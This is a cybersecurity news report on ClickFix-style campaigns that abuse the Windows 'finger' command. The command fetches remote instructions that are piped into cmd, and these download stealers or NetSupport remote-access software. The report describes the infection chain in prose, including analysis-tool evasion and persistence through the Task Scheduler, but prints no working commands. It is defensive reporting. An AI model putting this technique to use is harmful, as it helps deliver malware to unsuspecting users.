Relic Weaponized: Obscure ‘finger’ Command Used to Download Malware on Windows
A nearly forgotten utility command has unexpectedly returned to the spotlight after being discovered in new infection chains targeting Windows devices. A mechanism long regarded as a relic of the early internet is now being weaponized in attacks disguised as harmless checks and prompts presented to victims in a command-line window.
The finger command — once intended to retrieve information about users on Unix and Linux servers — was also present in older versions of Windows. It provided basic details such as account names, home directories, and other simple attributes. Although the protocol is still technically supported, its practical use has all but vanished. Yet this obscurity works to the attackers’ advantage: few people expect any meaningful network activity to take place through such an antiquated channel.
Recent observations show that finger is being incorporated into schemes reminiscent of ClickFix, in which commands executed on a device are fetched from a remote source. Researchers have long noted that the command can function as an auxiliary Windows tool capable of retrieving malicious payloads.
In the latest campaigns, this method has been further refined. MalwareHunterTeam shared a batch-script sample that queried a remote server via finger and piped the response directly into cmd for execution. The domains involved have since gone offline, but investigators have identified additional instances using the same technique.
Reports from early victims have already surfaced on Reddit. In one discussion, a user described encountering a fake CAPTCHA that instructed them to open the Run dialog and type a command to “prove” they were human. The supplied command issued a finger request to another server and sent the resulting output straight into the Windows interpreter.
The sequence created a temporary directory, copied the system’s curl binary under a random name, downloaded an archive disguised as a PDF, and extracted several Python files. The program then launched via pythonw.exe, contacted the attackers’ server, and displayed a counterfeit “verification” screen.
The archive’s contents suggested data-theft functionality. Simultaneously, MalwareHunterTeam uncovered another variant of the activity: finger was used to fetch a nearly identical command set, this time with added safeguards. Before executing any actions, the script scanned the system for malware-analysis tools — including Process Explorer, Procmon, Wireshark, Fiddler, and various debuggers. If any were detected, execution halted.
When no such tools were found, the script downloaded and unpacked a new archive, again masquerading as PDF documents. This time, the payload contained the NetSupport Manager remote-administration suite. After extraction, a series of commands configured the Task Scheduler to launch remote-access software at the next system login.
According to BleepingComputer, all noted incidents bear the hallmarks of a single group employing a unified strategy to distribute malware using ClickFix-style mechanisms. The effectiveness of these ploys stems largely from the command’s archaic nature — finger seems far too outdated to raise suspicion. Security experts advise blocking outbound connections on TCP port 79, the protocol’s transport channel, to reduce exposure.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
